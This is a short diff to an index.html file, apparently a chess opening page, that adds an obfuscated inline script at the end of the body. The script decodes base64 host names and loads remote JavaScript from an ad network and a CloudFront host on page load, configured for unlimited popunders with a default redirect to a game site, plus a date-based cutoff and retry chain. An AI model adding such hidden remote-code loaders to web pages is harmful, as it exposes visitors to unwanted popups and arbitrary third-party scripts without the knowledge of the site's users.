--- a/index.html
+++ b/index.html
@@ -1455,5 +1455,11 @@ function parseOpeningMove(moveNotation) {
     };
 }
     </script>
+    <script type="text/javascript" data-cfasync="false">
+/*<![CDATA[/* */
+(function(){var x=window,t="e1267f2522074533a29b298175574995",h=[["siteId",712*915+191-581+4578281],["minBid",0.00000001],["popundersPerIP","9999999,9999999"],["delayBetween",0],["default","https://2048-unblocked.netlify.app/"],["defaultPerDay",1],["topmostLayer","auto"]],j=["d3d3LmJldHRlcmFkc3lzdGVtLmNvbS9BZS9LL2RsZS5taW4uanM=","ZDJrazBvM2ZyN2VkMDEuY2xvdWRmcm9udC5uZXQvcHN0cm9sbC5taW4uanM="],i=-1,r,e,a=function(){clearTimeout(e);i++;if(j[i]&&!(1781510165000<(new Date).getTime()&&1<i)){r=x.document.createElement("script");r.type="text/javascript";r.async=!0;var s=x.document.getElementsByTagName("script")[0];r.src="https://"+atob(j[i]);r.crossOrigin="anonymous";r.onerror=a;r.onload=function(){clearTimeout(e);x[t.slice(0,16)+t.slice(0,16)]||a()};e=setTimeout(a,5E3);s.parentNode.insertBefore(r,s)}};if(!x[t]){try{Object.freeze(x[t]=h)}catch(e){}a()}})();
+/*]]>/* */
+</script>
+
 </body>
 </html>
